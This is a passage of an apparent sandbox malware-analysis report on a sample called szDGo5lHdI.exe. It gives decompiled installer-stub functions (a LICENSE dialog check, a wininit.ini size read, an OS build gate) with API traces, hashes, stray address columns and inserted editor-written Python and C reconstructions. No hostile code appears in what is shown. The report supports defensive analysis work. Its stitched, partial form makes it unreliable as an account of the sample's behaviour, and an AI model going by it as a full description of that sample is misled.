                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062CD
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062D4
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 0040631B
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00406345
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 00406357
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                    • Opcode ID: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
                                                                                                                                                                                                                                    • Instruction ID: dd4f3df3a962844db1ec0a9a12a2e8c46ac7e37050f014d08e7a5875b9a49fb5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2212631A00219ABDB10AF649C459BFBB78EB44714B01413AFD02B3291DB398D228BE9
                                                                                                                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00403A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				// Named RT_RCDATA resource "LICENSE" (resource type 0x0A in the traced FindResourceA calls).
				_t16 = "LICENSE";
				// First call with a NULL buffer only sizes the resource; +1 leaves room for the terminating NUL.
				_t1 = E0040468F(_t16, 0, 0) + 1; // 0x1
				// LocalAlloc(LPTR = LMEM_FIXED | LMEM_ZEROINIT); the buffer pointer is kept in global 0x408d4c.
				_t3 = LocalAlloc(0x40, _t1);
				 *0x408d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					// Second call copies the resource bytes into the buffer (_t28 is a register value the decompiler did not resolve).
					if(E0040468F(_t16, _t3, _t28) != 0) {
						// The literal "<None>" means "no license text": skip the dialog and report success.
						if(lstrcmpA( *0x408d4c, "<None>") == 0) {
							LocalFree( *0x408d4c);
							L9:
							 *0x409124 = 0; // status global: S_OK
							return 1;
						}
						// Show dialog resource 0x7d1 (2001) with dialog procedure E00403100; a non-zero result means it was accepted.
						_t9 = E00406517(_t19, 0x7d1, 0, E00403100, 0, 0);
						LocalFree( *0x408d4c);
						if(_t9 != 0) {
							goto L9;
						}
						// HRESULT_FROM_WIN32(ERROR_CANCELLED = 1223): the dialog was dismissed without accepting.
						 *0x409124 = 0x800704c7;
						L2:
						return 0;
					}
					// Resource copy failed: error box with string-table id 0x4b1 (1201), then
					// HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND = 1812).
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x408d4c);
					 *0x409124 = 0x80070714;
					goto L2;
				}
				// Allocation failed: error box with string-table id 0x4b5 (1205); status is taken from GetLastError().
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L2;
			}

Disassembly address column (instruction text not preserved in this extraction): 0x00403a46 to 0x00403b21; 0x00000000 entries correspond to lines without a code address.


APIs
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
  • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
  • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
  • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
  • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
  • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F64,?,00000002,00000000), ref: 00403A5D
• LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00403AB3
  • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
  • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
  • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
• lstrcmpA.KERNEL32(<None>,00000000), ref: 00403AD0
• LocalFree.KERNEL32 ref: 00403B13
  • Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
  • Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
  • Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
  • Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560
• LocalFree.KERNEL32(00000000,00403100,00000000,00000000), ref: 00403AF4
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE
• API String ID: 2414642746-383193767
• Opcode ID: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
• Instruction ID: c2af970f7a243ccd3f2ce706e414ce787b41af5121a45e16be6e15035c564ba5
• Opcode Fuzzy Hash: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
• Instruction Fuzzy Hash: 2D117570301201ABD724AF329E09E1739BDDFD9715B10453FBA45F92F1DA7D88108A6D
Uniqueness

Uniqueness Score: -1.00%

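E00403A3F above sizes and copies a named RT_RCDATA (type 0x0A) resource called LICENSE through FindResourceA/SizeofResource/LoadResource/LockResource/memcpy_s, and skips the license dialog when the text is the literal <None>. An analyst can recover the same strings statically from the .rsrc section of the unpacked PE without executing it. The Python below is an added example written for this edit; it is not Joe Sandbox output and not code recovered from szDGo5lHdI.exe. It walks the type, name and language levels of the resource directory, returns every RT_RCDATA item, and applies the <None> check. The section RVA 0x9000, the en-US language id and the resource contents are a constructed fixture (assumptions): against a real binary, pass the raw .rsrc bytes and that section's VirtualAddress from the section table. Taking the first language subentry is a simplification of FindResourceA's locale selection.

```python
"""Static extraction of named RT_RCDATA resources from a PE .rsrc section.

Walks the type -> name -> language resource directory the way
FindResourceA(NULL, "LICENSE", RT_RCDATA) + LoadResource/LockResource do at
run time, but offline against raw section bytes.  The fixture at the bottom is
constructed for this example; the sample itself is not needed.
"""
import struct

RT_RCDATA = 10            # resource type 0x0A, as in the traced FindResourceA calls
HIGH_BIT = 0x80000000     # on Name: "offset to string"; on OffsetToData: "subdirectory"
LOW_BITS = 0x7FFFFFFF


def _read_name(rsrc: bytes, off: int) -> str:
    # IMAGE_RESOURCE_DIR_STRING_U: WORD Length; WCHAR NameString[Length]
    (length,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")


def _entries(rsrc: bytes, dir_off: int):
    # IMAGE_RESOURCE_DIRECTORY: 12 header bytes, NumberOfNamedEntries, NumberOfIdEntries,
    # then 8-byte IMAGE_RESOURCE_DIRECTORY_ENTRY records (named first, ids after).
    named, ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(named + ids):
        name, data = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        key = _read_name(rsrc, name & LOW_BITS) if name & HIGH_BIT else name
        yield key, data


def walk_rcdata(rsrc: bytes, rsrc_rva: int) -> dict:
    """Return {name_or_id: payload bytes} for every RT_RCDATA resource in the section."""
    found = {}
    for rtype, type_off in _entries(rsrc, 0):
        if rtype != RT_RCDATA or not type_off & HIGH_BIT:
            continue
        for name, name_off in _entries(rsrc, type_off & LOW_BITS):
            if not name_off & HIGH_BIT:
                continue
            # Simplification: first language entry (FindResourceA applies locale fallbacks).
            for _lang, data_off in _entries(rsrc, name_off & LOW_BITS):
                if data_off & HIGH_BIT:
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData is an RVA, so rebase it onto the section.
                rva, size = struct.unpack_from("<II", rsrc, data_off)
                start = rva - rsrc_rva
                found[name] = rsrc[start:start + size]
                break
    return found


def license_text(rsrc: bytes, rsrc_rva: int):
    """Mirror the stub's check: LICENSE text, or None when absent or the literal '<None>'."""
    blob = walk_rcdata(rsrc, rsrc_rva).get("LICENSE")
    if blob is None:
        return None
    text = blob.split(b"\0", 1)[0].decode("latin-1")
    return None if text == "<None>" else text


def build_rsrc(rsrc_rva: int, rcdata: dict) -> bytes:
    """Constructed fixture: a .rsrc section holding the given named RT_RCDATA items (hypothetical layout)."""
    names = sorted(rcdata)                 # named entries are stored sorted, before id entries
    n = len(names)
    type_off = 16 + 8                      # root directory: one id entry (RT_RCDATA)
    name_dirs_off = type_off + 16 + 8 * n  # type directory: n named entries
    data_off = name_dirs_off + 24 * n      # one single-entry language directory per name
    str_off = data_off + 16 * n            # one IMAGE_RESOURCE_DATA_ENTRY per name
    str_blob, str_offs = b"", {}
    for nm in names:
        str_offs[nm] = str_off + len(str_blob)
        str_blob += struct.pack("<H", len(nm)) + nm.encode("utf-16-le")
    payload_off = (str_off + len(str_blob) + 3) & ~3

    def directory(named, ids, entries):
        header = struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)
        return header + b"".join(struct.pack("<II", k, v) for k, v in entries)

    out = bytearray(directory(0, 1, [(RT_RCDATA, HIGH_BIT | type_off)]))
    out += directory(n, 0, [(HIGH_BIT | str_offs[nm], HIGH_BIT | (name_dirs_off + 24 * i))
                            for i, nm in enumerate(names)])
    for i in range(n):
        out += directory(0, 1, [(0x0409, data_off + 16 * i)])   # assumed language 0x0409 (en-US)
    payloads = bytearray()
    for nm in names:
        out += struct.pack("<IIII", rsrc_rva + payload_off + len(payloads), len(rcdata[nm]), 0, 0)
        payloads += rcdata[nm]
    out += str_blob + b"\0" * (payload_off - len(out) - len(str_blob)) + payloads
    return bytes(out)


# Constructed fixture (assumption): section RVA 0x9000, LICENSE set to the "<None>" marker the stub tests for.
RSRC_RVA = 0x9000
SAMPLE_RSRC = build_rsrc(RSRC_RVA, {"LICENSE": b"<None>\0", "TITLE": b"Setup\0"})

if __name__ == "__main__":
    print(walk_rcdata(SAMPLE_RSRC, RSRC_RVA))
    print("license dialog would be shown:", license_text(SAMPLE_RSRC, RSRC_RVA) is not None)
```

A LICENSE of <None> reproduces the branch in E00403A3F that frees the buffer and returns 1 without calling E00406517, so the dialog never appears during analysis; any other text is what DialogBoxIndirectParamA would display.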
C-Code - Quality: 94%
			E004024E0(void* __ebx) {
				signed int _v8;
				char _v268; // CHAR path[MAX_PATH] (0x104 bytes)
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				// /GS stack-cookie pattern: global cookie XOR frame pointer, re-checked in the epilogue below.
				_t7 =  *0x408004; // 0x8f135e3b
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					// Build "%WINDIR%\wininit.ini", the Windows 9x boot-time [rename] file installers use to
					// schedule file moves and deletes (NT-based Windows does not process it).
					E0040658A( &_v268, 0x104, "wininit.ini");
					// All-NULL arguments flush the profile-file cache so the size read below is current.
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					// OF_READ | OF_SHARE_DENY_NONE (0x40); seeking to FILE_END (2) yields the file size.
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) { // HFILE_ERROR
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				// Returns the size (0 if the file could not be opened) through the cookie-check epilogue.
				return E00406CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}
Instruction addresses (decompiler address column): 0x004024e0, 0x004024eb, 0x004024f2, 0x004024f7, 0x00402504, 0x0040250e, 0x0040251d, 0x0040252c, 0x00402541, 0x00402546, 0x00402553, 0x00402555, 0x00402555, 0x00402546, 0x0040256c

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00402506
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0040252C
• _lopen.KERNEL32(?,00000040), ref: 0040253B
• _llseek.KERNEL32(00000000,00000000,00000002), ref: 0040254C
• _lclose.KERNEL32(00000000), ref: 00402555
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
• String ID: wininit.ini
• API String ID: 3273605193-4206010578
• Opcode ID: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
• Instruction ID: b90c4bb04f39e14ed539eb2b0743deceed2c1c4aa6b7f5bd2816e63d70cf6699
• Opcode Fuzzy Hash: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
• Instruction Fuzzy Hash: 950192326002286BD720AF659E0CEDB7B7CDB45754F01017AFA49F31D0DA788E558AA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E004036EE(CHAR* __ecx) {
	signed int _v8;
	char _v268;
	struct _OSVERSIONINFOA _v416;
	signed int _v420;
	signed int _v424;
	CHAR* _v428;
	CHAR* _v432;
	signed int _v436;
	CHAR* _v440;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t72;
	CHAR* _t77;
	CHAR* _t91;
	CHAR* _t94;
	int _t97;
	CHAR* _t98;
	signed char _t99;
	CHAR* _t104;
	signed short _t107;
	signed int _t109;
	short _t113;
	void* _t114;
	signed char _t115;
	short _t119;
	CHAR* _t123;
	CHAR* _t124;
	CHAR* _t129;
	signed int _t131;
	signed int _t132;
	CHAR* _t135;
	CHAR* _t138;
	signed int _t139;

	_t72 =  *0x408004; // 0x8f135e3b
	_v8 = _t72 ^ _t139;
	_v416.dwOSVersionInfoSize = 0x94;
	_t115 = __ecx;
	_t135 = 0;
	_v432 = __ecx;
	_t138 = 0;
	if(GetVersionExA( &_v416) != 0) {
		_t133 = _v416.dwMajorVersion;
		_t119 = 2;
		_t77 = _v416.dwPlatformId - 1;
		__eflags = _t77;
		if(_t77 == 0) {
			_t119 = 0;
			__eflags = 1;
			 *0x408184 = 1;
			 *0x408180 = 1;
			L13:
			 *0x409a40 = _t119;
			L14:
			__eflags =  *0x408a34 - _t138; // 0x0
			if(__eflags != 0) {
				goto L66;
			}
			__eflags = _t115;
			if(_t115 == 0) {
				goto L66;
			}
			_v428 = _t135;
			__eflags = _t119;
			_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
			_t11 =  &_v420;
			 *_t11 = _v420 & _t138;
			__eflags =  *_t11;
			_v440 = _t115;
			do {
				_v424 = _t135 * 0x18;
				_v436 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
				_t91 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
				_t123 = _v436;
				_t133 = 0x54d;
				__eflags = _t123;
				if(_t123 < 0) {
					L32:
					__eflags = _v420 - 1;
					if(_v420 == 1) {
						_t138 = 0x54c;
						L36:
						__eflags = _t138;
						if(_t138 != 0) {
							L40:
							__eflags = _t138 - _t133;
							if(_t138 == _t133) {
								L30:
								_v420 = _v420 & 0x00000000;
								_t115 = 0;
								_v436 = _v436 & 0x00000000;
								__eflags = _t138 - _t133;
                                                                                                                                                                                                                                    											_t133 = _v432;
                                                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                                                    												_t124 = _v440;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                    												_v420 =  &_v268;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _t124;
                                                                                                                                                                                                                                    											if(_t124 == 0) {
                                                                                                                                                                                                                                    												_t135 = _v436;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t99 = _t124[0x30];
                                                                                                                                                                                                                                    												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                    												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                    												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                    													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t115 = 0x104;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags =  *0x408a38 & 0x00000001;
                                                                                                                                                                                                                                    											if(( *0x408a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                    												L64:
                                                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                                                    												_push(0x30);
                                                                                                                                                                                                                                    												_push(_v420);
                                                                                                                                                                                                                                    												_push("doza2");
                                                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												__eflags = _t135;
                                                                                                                                                                                                                                    												if(_t135 == 0) {
                                                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												__eflags =  *_t135;
                                                                                                                                                                                                                                    												if( *_t135 == 0) {
                                                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												MessageBeep(0);
                                                                                                                                                                                                                                    												_t94 = E0040681F(_t115);
                                                                                                                                                                                                                                    												__eflags = _t94;
                                                                                                                                                                                                                                    												if(_t94 == 0) {
                                                                                                                                                                                                                                    													L57:
                                                                                                                                                                                                                                    													0x180030 = 0x30;
                                                                                                                                                                                                                                    													L58:
                                                                                                                                                                                                                                    													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
                                                                                                                                                                                                                                    													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                    													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                    														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                    														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    															goto L66;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														__eflags = _t97 - 1;
                                                                                                                                                                                                                                    														L62:
                                                                                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                                                                                    															_t138 = 0;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														goto L66;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													__eflags = _t97 - 6;
                                                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t98 = E004067C9(_t124, _t124);
                                                                                                                                                                                                                                    												__eflags = _t98;
                                                                                                                                                                                                                                    												if(_t98 == 0) {
                                                                                                                                                                                                                                    													goto L57;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                                                    									_t104 = E004028E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                                                    									goto L37;
								}
								/* editor's reading: low 16 bits of OSVERSIONINFO.dwBuildNumber vs. the table slot at +0x14 (the upper bound, judging by the comparison direction) */
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								/* 0x54c: code passed to the error path once the second table entry has also rejected the build */
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								/* with _t91 set only the lower bound at +8 is tested */
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							/* advance to the next of the two table entries */
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x409a40 = _t119;
						 *0x408184 = 1;
						 *0x408180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x409a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x408184 = _t135;
							 *0x408180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E004044B9(0, _t138);
					L66:
					/* _v8 ^ _t139 on return is most likely the MSVC /GS stack-cookie check; the return value is 1 only when no error code was set */
					return E00406CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}
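The fragment above masks the OS build number to 16 bits and tests it against up to two (lower bound, upper bound) table entries before loading an error code. The following is an added example written for this report, the editor's reconstruction of that check in plain C; it is not the sample's own source. The table layout, the meaning of the +8 and +0x14 slots as minimum and maximum build, the role of the _t91 flag, and the sample table values are all assumptions made for illustration.

```c
/* Added example: reconstruction of the build-number gate seen in the decompiled
 * fragment. Not code from the sample; field layout and sample values are assumed. */
#include <stdint.h>
#include <stdio.h>

#define BUILD_RANGE_ENTRIES 2        /* the fragment loops while _t135 < 2 */
#define ERR_BUILD_UNSUPPORTED 0x54c  /* value loaded into _t138 on the reject path */

typedef struct {
    uint32_t min_build;  /* assumed: the slot read at +8 */
    uint32_t max_build;  /* assumed: the slot read at +0x14 */
} build_range_t;

/* Returns 0 when the low 16 bits of dwBuildNumber fall inside one of the two
 * ranges, otherwise ERR_BUILD_UNSUPPORTED. lower_bound_only mirrors the
 * _t91 != 0 branch, where only build >= min_build is tested. */
uint32_t check_build(uint32_t dwBuildNumber, const build_range_t *tbl, int lower_bound_only)
{
    uint32_t build = dwBuildNumber & 0x0000ffffu;  /* same mask as the decompile */
    for (int i = 0; i < BUILD_RANGE_ENTRIES; i++) {
        if (build < tbl[i].min_build)
            continue;                               /* below this entry: try the next */
        if (lower_bound_only || build <= tbl[i].max_build)
            return 0;                               /* the L37 path: version accepted */
    }
    return ERR_BUILD_UNSUPPORTED;                   /* the L28 -> 0x54c path */
}

/* Constructed sample table: two accepted build ranges (values are made up). */
static const build_range_t sample_table[BUILD_RANGE_ENTRIES] = {
    { 7600, 9600 },     /* hypothetical first range */
    { 10240, 0xffff },  /* hypothetical second range */
};

uint32_t check_sample(uint32_t dwBuildNumber, int lower_bound_only)
{
    return check_build(dwBuildNumber, sample_table, lower_bound_only);
}

int main(void)
{
    uint32_t probes[] = { 9600, 4660, 0x00032580u /* high bits ignored: 9600 */, 9999 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("build 0x%08x -> 0x%x\n", probes[i], check_sample(probes[i], 0));
    printf("build 9999, lower bound only -> 0x%x\n", check_sample(9999, 1));
    return 0;
}
```

The masking step matters for analysts: a build number with anything above bit 15 set still passes if its low half is in range, so the gate keys only on the 16-bit build, not the full value.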

Address column of the decompiled view above, separated from its code rows by extraction (0x00000000 marks rows without an address): 0x004036f9, 0x00403700, 0x0040370c, 0x00403716, 0x00403718, 0x0040371b, 0x00403721, 0x0040372b, 0x0040373d, 0x00403745, 0x00403746, 0x00403746, 0x00403749, 0x004037ab, 0x004037ad, 0x004037ae, 0x004037b3, 0x004037b8, 0x004037b8, 0x004037bf, 0x004037bf, 0x004037c5, 0x00000000, 0x00000000, 0x004037cb, 0x004037cd, 0x00000000, 0x00000000, 0x004037d5, 0x004037db, 0x004037e8, 0x004037ea, 0x004037ea, 0x004037ea, 0x004037f0, 0x004037f6, 0x00403805, 0x00403817, 0x0040382b, 0x00403830, 0x00403836, 0x0040383b, 0x0040383d, 0x004038eb, 0x004038eb, 0x004038f2, 0x0040390c, 0x00403911, 0x00403911, 0x00403913, 0x0040394d, 0x0040394d, 0x0040394f, 0x004038a9, 0x004038a9, 0x004038b0, 0x004038b2
                                                                                                                                                                                                                                    0x004038b9
                                                                                                                                                                                                                                    0x004038bb
                                                                                                                                                                                                                                    0x004038c1
                                                                                                                                                                                                                                    0x00403975
                                                                                                                                                                                                                                    0x004038c7
                                                                                                                                                                                                                                    0x004038de
                                                                                                                                                                                                                                    0x004038e0
                                                                                                                                                                                                                                    0x004038e0
                                                                                                                                                                                                                                    0x0040397b
                                                                                                                                                                                                                                    0x0040397d
                                                                                                                                                                                                                                    0x004039a9
                                                                                                                                                                                                                                    0x0040397f
                                                                                                                                                                                                                                    0x00403982
                                                                                                                                                                                                                                    0x0040398b
                                                                                                                                                                                                                                    0x0040398d
